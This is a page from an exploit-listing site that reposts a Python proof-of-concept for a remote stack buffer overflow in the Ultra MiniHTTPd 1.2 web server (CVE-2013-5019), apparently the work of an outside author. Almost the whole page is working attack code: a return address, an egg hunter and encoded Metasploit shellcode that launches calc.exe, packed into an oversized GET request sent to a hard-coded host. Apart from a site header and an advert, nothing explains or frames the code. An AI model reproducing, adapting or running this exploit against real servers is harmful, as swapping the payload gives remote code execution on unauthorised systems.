Registerultra minihttpd 1.2 get remote stack buffer overflow (poc)
▸▸▸ Exploit & Vulnerability >> local exploit & windows_x86 vulnerability
Online Vulnerability Scanner Tools
Code...
# Exploit Title: Ultra MiniHTTPd 1.2 - 'GET' Remote Stack Buffer Overflow # Date: 2018-04-14 # Exploit Author: jollymongrel # Vendor Homepage: http://www.vector.co.jp # Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html # Version: 1.2 # Tested on: Windows 7 32-bit # CVE : CVE-2013-5019 import sys import socket import struct eip = struct.pack('I', 0x764046cd) #call esp [msvcrt.dll] #windows/exec - 274 bytes #http://www.metasploit.com #Encoder: x86/shikata_ga_nai #EXITFUNC=thread #CMD=calc.exe #badchars='\x00\x09\x0a\x0b\x0c\x0d\x20\x2f\x3f' shellcode = ("no0bno0b"+"\xb8\x21\xa0\xa2\xbd\xdb\xd1\xd9\x74\x24\xf4\x5b\x31\xc9\xb1" "\x3e\x31\x43\x15\x83\xc3\x04\x03\x43\x11\xe2\xd4\x1a\x51\xd8" "\x25\xbd\x4c\xf4\x90\x35\x55\x0f\x79\x9f\x5c\x5e\x45\x5c\xb5" "\x5d\x84\x31\x44\x9d\x46\xde\x89\xb2\x1a\x92\xe6\x1d\x26\x1d" "\xa1\xb0\xfa\x6c\x5a\x1e\xf7\xb7\xb6\xfb\x71\xbf\x2a\x51\xb6" "\x2a\x53\x27\x2a\x43\x49\x67\xe7\x66\x6a\x6e\xe3\x10\x46\x27" "\xe5\x1f\xc5\xb5\xad\x32\x57\x38\xd3\x66\xa8\xa7\xf8\xe0\xfc" "\x1a\x33\xce\x22\xf0\xad\x34\xff\x3a\x42\x91\x07\x6d\xe5\xf1" "\x79\x73\xa3\xe9\xbf\xd7\xbf\xa7\x10\x06\xf2\x2c\x81\x6a\xa0" "\x97\x46\xae\xe7\x33\x1c\x87\x02\x5d\x8d\xd7\x5a\xbe\x7c\xa9" "\x96\x7f\x04\xbd\xe4\xb5\xbc\xa0\xf5\xf3\x12\x66\x6c\xbc\xb7" "\xb2\x49\x01\x66\xd3\x8f\x40\x5b\x33\x07\x22\x30\x0e\x11\xc6" "\x89\xfa\xbc\x18\x0f\x33\x18\xb1\x01\xe0\x53\x4a\x23\xab\x77" "\x17\x7f\xf8\x4f\xdd\x01\x79\x04\xa6\x82\xe0\xc4\x33\x06\x12" "\x36\x43\x2d\xc6\x8a\xfb\x24\x67\x4a\xc6\x5a\x4a\x4c\x97\x4c" "\x1b\x68\x98\xf8\x45\x2d\x86\x43\xbe\x0e\x96\x8f\xca\x89\x7e" "\x5b\xe1\x8b\xb2\x5f\xd0\x94\xdf\x5e\x7c\x0e\x25\xa5\xf7\xea" "\x9d\x1b\xa9\x58\x50\x3a\xb8\x77\x16\xb1\x87\x48\x94\x37\x87" "\x9a\x9d\xe2\xd0") #egg hunter to search for no0bno0b egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" "\xef\xb8\x6e\x6f\x30\x62\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") payload = "A" * 537 payload += shellcode payload += "A" * (967 - len(payload)) payload += eip payload += egghunter payload += "\xff\xe7" #jmp edi payload += "C" * (1007 - len(payload)) print "[+] sending payload, length", len(payload) buf = "GET /"+payload+"HTTP/1.1\r\n\r\n" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("192.168.32.175", 80)) s.send(buf) data = s.recv(1024) s.close()
Ultra minihttpd 1.2 get remote stack buffer overflow (poc) Vulnerability / Exploit Source : Ultra minihttpd 1.2 get remote stack buffer overflow (poc)
Last Vulnerability or Exploits
Easy integrations and simple setup help you start scanning in just some minutes